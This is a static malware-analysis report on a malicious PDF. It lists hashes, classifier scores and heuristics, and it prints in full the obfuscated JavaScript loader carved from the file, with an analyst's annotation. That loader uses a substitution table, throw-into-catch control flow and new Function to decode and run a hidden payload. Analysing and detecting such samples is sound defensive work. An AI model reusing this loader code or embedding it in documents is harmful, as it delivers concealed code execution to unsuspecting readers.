Malicious PDF — malware analysis report

Static analysis result for SHA-256 331f597c055d97d0…

MALICIOUS

PDF

Size: 37.4 KB · Created: 2010-07-19 09:56:54 -05:00 · Authoring application: GPL Ghostscript 8.62 · First seen: 2026-05-08
MD5: 67df0c43b5df4aeb11bc4f3524dc2812 SHA-1: 47538bd499a56c9d2d7bd3b8012e5b11d049b1a0 SHA-256: 331f597c055d97d03a64dbd84019c8bf27451f240b89946e31c4db188fe0bde4
Risk Score: 70

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file was flagged as malicious by an ML classifier and contains embedded JavaScript. The JavaScript is heavily obfuscated, making it difficult to determine its exact function, but the presence of obfuscation and the ML classification strongly suggest it is malicious. The primary heuristic that fired indicates the presence of JavaScript actions within the PDF, and an artifact named 'javascript_obj0237_000.js' was extracted; its preview shows a character-substitution table used to rebuild a string that is then compiled with new Function and invoked, which is why the script's real behaviour is not visible in the listing as extracted. The obfuscated script likely attempts to download and execute a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9188

Heuristics 5

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF differential parser failed info PDF_DIFFERENTIAL_PARSE_FAILED
    The cross-check parser (pdfminer.six) failed on this file (PDFSyntaxError). Static heuristics still ran and their findings above remain valid; only the differential cross-check signal is missing.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/iX/1.0/ In PDF document text
    • http://ns.adobe.com/pdf/1.3/ In PDF document text
    • http://ns.adobe.com/xap/1.0/ In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/ In PDF document text
    • http://purl.org/dc/elements/1.1/ In PDF document text

Extracted artifacts 8

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0237_000.js pdf-javascript-stream PDF /JS object 237 at offset 0x2DB3 8055 bytes
SHA-256: 044ab828e592224164e14c967086b871de51118938f226e042d6b5b5c1484956
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s). 116 of 190 identifiers look randomly generated (e.g. 'nzlAfSGivVX'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
/*
 * Analyst annotation (added at review time; the code below is byte-identical
 * to the carved artifact javascript_obj0237_000.js listed above).
 *
 * What the visible script does, read from the listing only:
 *  1. mbN_ffawS is a one-character -> one-character substitution table.
 *  2. Many short string fragments (LACJQ, TGxDl, bxmjHw, ...) are
 *     concatenated into TsOacH inside a catch block. The preceding try block
 *     calls IMEqvd(), which is not defined anywhere in this listing (nor is
 *     GSipe()); the resulting ReferenceError is presumably what routes
 *     execution into the catch branches — the same try/undefined-call/catch
 *     pattern recurs at every stage below.
 *  3. JRphNjh is assigned TsOacH the same way, then decoded one character at
 *     a time: PvxDges += mbN_ffawS[JRphNjh.charAt(ywGUoaQK)].
 *  4. The decoded string is compiled with new Function(PvxDges) and invoked
 *     as ywGUoaQK(). The decoded content is not shown in this listing and is
 *     not reproduced in this annotation.
 *  Everything else — argument-less Math.* calls, unused literals, if/else
 *  branches on unrelated values, empty catch blocks — appears to be filler
 *  that does not feed the decode path.
 *
 * Triage notes: the indicators that matter for detection are the
 * substitution table plus the charAt-lookup loop whose output reaches
 * new Function, and the throw-into-catch control flow driven by calls to
 * names that are never defined. The staged string (TsOacH) can be recovered
 * statically by applying mbN_ffawS in an isolated analysis environment,
 * without executing the sample.
 */
var mbN_ffawS={"9":" ","r":"!","E":"#","?":"$","h":"%","5":"&","0":"'","v":"(","A":")","'":"*","(":"+",".":",","&":"-","\\":"\/","2":".","|":"0","<":"1","y":"2","b":"3","\/":"4","3":"5",")":"6","X":"7","w":"8","#":"9","g":":","f":";","B":"<",",":"=","e":">","N":"?","+":"@","R":"A","Y":"B","W":"C","K":"D","J":"E","V":"F","-":"G","o":"H","[":"I","a":"J","C":"K","s":"L","@":"M","=":"N","~":"O","m":"P",">":"Q","F":"R","p":"S","u":"T","U":"U","`":"V","q":"W","}":"X","d":"Y","j":"Z","c":"[","%":"\\","6":"]","T":"^","8":"_","Q":"`","*":"a","O":"b","{":"c"," ":"d","$":"e","S":"f","n":"g","l":"h","1":"i","P":"j","4":"k","t":"l",";":"m","]":"n","G":"o","k":"p","L":"q","i":"r","D":"s","z":"t","H":"u","x":"v","M":"w","7":"x",":":"y","^":"z","Z":"{","!":"|","_":"}","I":"~"};var xG_yITSh="";var FHiDy=Math.acos();var Solr_URy=Math.LN2;var TsOacH=false;var ywGUoaQK;var VM_Dz=Math.exp();var Retjw=false;var bqmXAy="";var LACJQ="%HSS|$%H|/33%HOw3X%H{$$S%H)|$|%H";var TGxDl="S%HbySS%HwO{|%HSySX%H/S*$%H)3Ow%";var iBCpbCbFG="i*:vAf`7kXK]>,0%H#|#|";var phBxMLT=Math.LN10;var oRQqgVO="%H* /<%HSSbb%H|Sb)%H</O$%Hb";var kDjosaJDj="HwO$y%H$O${%H3*/S%Hwb3y%H3)$*%H33w#%H3)|/%HwO3X%Hb{";var RjMrZaxX=")3Xw0fMl1t$v`7kXK]";var AknjDhQkW="3)%Hy|X)%HSb|b%H{#bb%H3|/#";var JAqP=Math.E;var nxnjXRMyX="Ow3y%H{*bb%H3Ow*%H*y$w%HSSS";var YWYjE=";$ 1*2]$Mmt*:";var SKbEPb="Afp >;mkvAfzi:Zzl1D2";var UgGju="]{z1G]vAZHz1tc0pk[i=1u]Vz> m@02i$kt*{$v\\cR&j6";var xnXgpku="%H//)*%H <3*%HyO$y%";var mHVfrv=" b%Hw*|/%H{b|b%H3$3S%H{b3|%HX w %H3X|w%H";var uXcNdb=Math.PI;var cdBUxF=")zfp >;mk,SH";var IPcVQ="H<//|%H||wO%H||wO%H3wwO%H$O<|%HwO|#%H";var rWzqrR="\\n.00A6v0k+<R<V<<@<C<<u<<FF<<p<<K<<<<m><<FF<<@=W<";var _cwGSbzh="Xb%HX/wO%HXwbb%HSb|b%HwO";var lUacaD=") ){%HOw3/%H/$w$%H${|$%H33SS%H#b|/";var qkJbwrk_="b//|%H/|w %HwOX{%Hb{3w";var ZNGySZ="|&a*~]|$J2t$]nzlAfSGivVX{|8kF,|";var ElPCtg="9x*i9p >;mk.>iaG^Wbfx*i9`7kXK]>.a*~]|$J.VX{|8kF";var wYKuUWz="%H$3X3%HwO3$%Hy//)%H{b|b%HwO))%H/w|{%H3)wO%H|b<{%HwO";var 
bxmjHw="\\cR&j6\\n.00A.]$M9K*z$vAAf_f>iaG^Wb,]$M9Ri";var WZcHzX="fVX{|8kFBy#||fVX{|8kF((A>iaG^WbcVX{|8kF6,`7kXK]";var pfiMFc=")%HX|yS%H33SS%H3O|/%HSSbb%H3)3X%H#wOw%Hw*S$";var lpamT="%H#|#|0fa*~]|$J,0%H{|bb%HwO)/%Hb|/|%H|{Xw%H/|wO%HwO|{%";var WQFIA="w|b%HX/Sy%H{<|w%H| {S%HS*|b%H$O/|%H";var _hTAkQqT="H)3y$%H*OXw%H#w))%H*O))%H){O";var CcKgurZEl=">2t$]nzlB,|7w|||A`7";var mODLgLTxO="fx*i9aSC);=z.~LFD";var yWXpp="33SS%H)w|/%HX/X/%Hb*X|%HySyS%Hb#b<%Hy$by%Hb)b<%";try{var HZOEKna=Math.LN2;}catch(eRheMls){{var yOVJkh=4065;}};var ilSyxi=">(a*~]|$Jfp >;mkv";var hAACoFwT="<<9g9:>:::--<m<><02i$kt*{$v";var hPgfZjw_="3w$S%HSwbO";var lgJumyv="%Hbb3|%H3|{|%H3)3|%H33wO%Hwb|/%HXS{y%H{ywb%H3yb<%HOw3|%H<*b";var AlEHMnahJ="$iv]HttAf_{*z{lvaSC);=zAZ_p >;mkvAf";var TFPzc="|%H$|w*%H3|#w%H)S)w%Hy$)$%H)w)/%HXyX3%H";var XId_w_I="Hy$bw%Hy$b|%Hb|b<%HySbX%H)#))%H)3){%H)3y$%H";var vCswP="kXK]>(,`7kXK]>f`7kXK]>,`7kXK]>2DHODziv|.|7w||";var Uo_DMpmh=Math.atan();var KFGrgV=new Number();try{try{var hBTsRBU='knwwF0'.length;}catch(BxavlsmS){};if(Solr_URy>JAqP){var mqUMe=new Number();}else{var UWho=true;};var vtYnnhS='FK{zMJ*00ljdqU0CTpb+8+';var lXqyI=7821;var ghWLZMc=-0.254464;if(Retjw<=uXcNdb)var ZBWwQEx=false;var _bZskcwt=false;IMEqvd();var OIqm=4975;TsOacH='Kqwga';var sMBRGbPK=Math.LOG2E;var GPYc_ock=-0.9;var oXeLIh=-0.7;var ZHjvdl=Math.random();}catch(QZJYGv){var uWzdLRh=Math.cos();TsOacH=ElPCtg+mODLgLTxO+cdBUxF+UgGju+rWzqrR+hAACoFwT+bxmjHw+iBCpbCbFG+lpamT+IPcVQ+qkJbwrk_+xnXgpku+kDjosaJDj+_cwGSbzh+AknjDhQkW+oRQqgVO+WQFIA+hPgfZjw_+wYKuUWz+mHVfrv+nxnjXRMyX+TGxDl+_hTAkQqT+TFPzc+lUacaD+lgJumyv+pfiMFc+LACJQ+yWXpp+XId_w_I+RjMrZaxX+CcKgurZEl+vCswP+ZNGySZ+WZcHzX+ilSyxi+SKbEPb+YWYjE+AlEHMnahJ;try{var izNwzWaP=Math.LN2;}catch(zUau_Ft){};var Iyykg=false;var emlZW='(t=0izP@OT))sKTk-+J)0^';var fkwBnSb='qU2j)'.toLowerCase();var CeYlUv=1223;var vubOkepn='0PWz'.toLowerCase();var pmBOlM=new Date();var tPlyUV=Math.sin();var hMklGhVJ='tm5FT^CUy(pR={lnDMOD{R';var QQqYsHEN=' E_puAZM6q`_o%00q)4J5';var 
NkFyN='cq6`=YJxZ4f0x^0x`@9s';TsOacH+=bqmXAy+xG_yITSh;}try{;var cxCfCwx=1612;var Cqjgmd=Math.LN10;var XXooYSYV='9{5! ee9G3RJm`DeM2s`&';var bJob='bV0iH'.toLowerCase();var JRphNjh='rtJUjm';if(oXeLIh>=XXooYSYV)var FJpIWj=Math.atan();else var wmjHurr=new Number();try{var jYID=8177;}catch(yHhn){{var ZrXEpAWP=new Error();}};var ewtaJ=Math.cos();var zJYZpnXY=true;try{var lMEf=0.51;}catch(En_YD){};try{var OALRbbn=true;}catch(YPnX){{var aZQxipcI=false;}};var gWPjt='PbOmss(d6An8kEz+up';var t_xYsQML=false;JRphNjh=GSipe();}catch(QZJYGv){try{;IMEqvd();var Lyh_=Math.exp();try{var aHAm=new Object();}catch(chwk){};if(uWzdLRh!=fkwBnSb){var wULjXdZt=-0.99;};var wHtBZ=new Object();var FA_Fust=Math.exp();var JYbIYgc=Math.LOG2E;try{var FlVpQIi=Math.SQRT12;}catch(IEwcvz){};var qxTe=7337;try{var KbIgKMQ=Math.SQRT12;}catch(UjrBZaBi){{var Jnqomq=new Number();}};}catch(QZJYGv){var rKfEyOwF=new Object();JRphNjh=TsOacH;var CHAcF=true;if(Iyykg>=Retjw)var aTWCIfS='UwFuHdj X0u'.replace(/[a-z]/,'');if(hMklGhVJ||sMBRGbPK){var GosoNyv=6207;}else{var lAvHV=new Error();};var QdSFTr=Math.acos();var fgRLu_l=Math.E;if(FHiDy||vubOkepn){var VJkdi='B@C7!3Xr)aHT8@'.replace(/[a-z0-9]/,'');};var CmmRdug=Math.SQRT12;var anTIhuo='`wj hv^'.length;}}try{var UJsL='AcrzS#s3q`wmRJ*N1YOJ';try{var rQwJ=Math.sin();}catch(YqQS_){{var DSHsWsA=true;}};try{var JSJalia=Math.LOG2E;}catch(ygRddfaf){{var OCXpKIC=new Array();}};try{var BWhrJVg=4610;}catch(yenWes){};var PvxDges;var kKEq_=true;var OGHY=new Boolean();var vfCp=new Function();PvxDges=GSipe();var dwcO=Math.cos();if(ghWLZMc==UJsL){var EREggC='w2&)SJyVqfA'.replace(/[0-9]/,'');};var nAEu=true;try{var GLFcoW=new Error();}catch(zshz){{var QkoUIzB=6350;}};var LvINKKMA=Math.E;var enGRv__F='26DWOf#q'.toLowerCase();}catch(PvxDges){var iTXsH=Math.asin();var f_ihZfl=new String();var NYmFOqVx=Math.LOG2E;if(lXqyI>=f_ihZfl){var hrJlbUnR='X0x=L~^z0v~THv&';}else{var nAhFItff=Math.E;};try{var DSYNdHJD=new Boolean();}catch(Rahefhw){};var cDVcRm=null;if(PvxDges!=cDVcRm){var 
eQvq_dlH=Math.sin();if(dwcO==anTIhuo){var QJNXx=Math.sin();};var xujROYdQ='A5-R)ER5j)tR'.replace(/[0-9]/,'');var cIFf=new Object();var QYniSFgi=Math.E;try{var XgHI=Math.SQRT2;}catch(CpaKS){{var oxcIopoX=new String();}};var mAFeWLtX=new Function();PvxDges=0;var rbOhwlAQ=Math.E;}try{while(PvxDges<JRphNjh.length){IMEqvd(PvxDges++);}}catch(PvxDges){PvxDges='';var Cfdh=Math.PI;if(nAEu!=FHiDy)var nOpNBL=Math.LN10;try{var GyusnF=true;}catch(rUHHCJe){};if(LvINKKMA>JAqP){var Jxynnp=-0.157938;}else{var bkdcx=9865;};var WyQPedX=Math.E;var bmcrr=Math.PI;var zyPb='%q-nhON-AuQg5'.replace(/[a-z]/,'');for(ywGUoaQK=0;ywGUoaQK<JRphNjh.length;ywGUoaQK++){PvxDges+=mbN_ffawS[JRphNjh.charAt(ywGUoaQK)];}try{ywGUoaQK=function(){IMEqvd();};try{var wRdkD=590;}catch(ULPqVtjP){};var HBNkDjX=Math.sin();var msAK=new Boolean();var JVWoOab=new Number();var SMtxI=false;GSipe();var edORyVux=Math.LN2;var zEbUGY=new Number();}catch(QZJYGv){ywGUoaQK=new Function(PvxDges);if(zEbUGY>fkwBnSb){var CbyeyeVA='(icPWDqVBrvI+sjTOcU4';};var dJOk=Math.abs();try{var VcurKg=false;}catch(joyy_wBy){{var ZhIBw=Math.sin();}};var LqAsngck='0cO5^&zqH`g7c1$nu`vk';var nf_ABoaN=0.992;try{var SgrKlge=Math.abs();}catch(zdMR){{var L_yq=-0.06;}};if(rbOhwlAQ||vubOkepn)var uY_amjIW='4BZSi*Evo5hjH&k+0v0';else var VAeWMFf=3704;var rLqm='BYi*`@^czk{PvjlMbRe';try{var XmfjfMGJ='DN0C`FK&n'.toString();}catch(vsUTu){};try{var dNKYJN=Math.LN10;}catch(iBLNuPu){{var dFxj='!TgNofLc}BxoL`@X0';}};try{var pxBTrnc=-0.997;}catch(GuJxmJpE){{var CoWub=0.6435150;}};ywGUoaQK();var vSBmPH=Math.LOG2E;var _xFMw_Ri='k(QW&GUq^!^Pp Y31j@0E$N';var RvljWv=false;}}try{var TxgJi=true;}catch(NgRVI){};var jCEm=Math.SQRT12;var QzhCD=new Error();if(vSBmPH>=KFGrgV){var RGHk='Zqd0@mWzPr '.replace('tCEGWVP','');}else{var VJBkLS=new Number();};if(_bZskcwt>fkwBnSb)var dcsaQ=-0.643;else var iAKV=-0.262;var XcJsCos=false;try{var hAFcj=new Number();}catch(zabJbs){{var WLPKr=Math.acos();}};var GiqijEfT=true;if(HBNkDjX==phBxMLT){var pTwirj=5446;}else{var 
UQAVsy=Math.sin();};}var UcQZtjc=new String();var UvHuc=Math.asin();var NMPcyr='}`SuWBi&c(!+r90i9u_Sw';var lLLmvipI=new Object();
font_00_cff_off00004a2c.bin pdf-font-stream PDF embedded font (cff) at offset 0x4A2C 1065 bytes
SHA-256: c5388dbfd357955527f956cb5d141afebfc49f4aba234a2dc3435c4db80371a6
font_01_cff_off00004f40.bin pdf-font-stream PDF embedded font (cff) at offset 0x4F40 284 bytes
SHA-256: 7d74f6c7a87276d66c859f02fcc8bdde22fb6d1bd67f9679c9e2870e43f811a0
font_02_cff_off000051c2.bin pdf-font-stream PDF embedded font (cff) at offset 0x51C2 2762 bytes
SHA-256: 6b603a7321354a2f666a4d44dadba63c3d08655ca1334fd2180809de6dd63710
font_03_cff_off00005b91.bin pdf-font-stream PDF embedded font (cff) at offset 0x5B91 1070 bytes
SHA-256: ee97fcf56dee5b6195651df2574076032ebe380a0157859d701ba31c21bd8880
font_04_cff_off000061da.bin pdf-font-stream PDF embedded font (cff) at offset 0x61DA 8857 bytes
SHA-256: ad54daaa4e22303d71e4efdaed06e7249064ae61f91241b4ea619b5c6dcc6fcf
font_05_cff_off00007cbb.bin pdf-font-stream PDF embedded font (cff) at offset 0x7CBB 1047 bytes
SHA-256: 9e11d54182dfb3d0e8a3d9784b7f3a015dc9f1917a21efad61e15f66a4f5d3cc
font_06_cff_off0000820b.bin pdf-font-stream PDF embedded font (cff) at offset 0x820B 3044 bytes
SHA-256: e96ab6cfcc1c7bfea431b05eae85de0f68cfbea8595a7d44b2e57a41049f59d7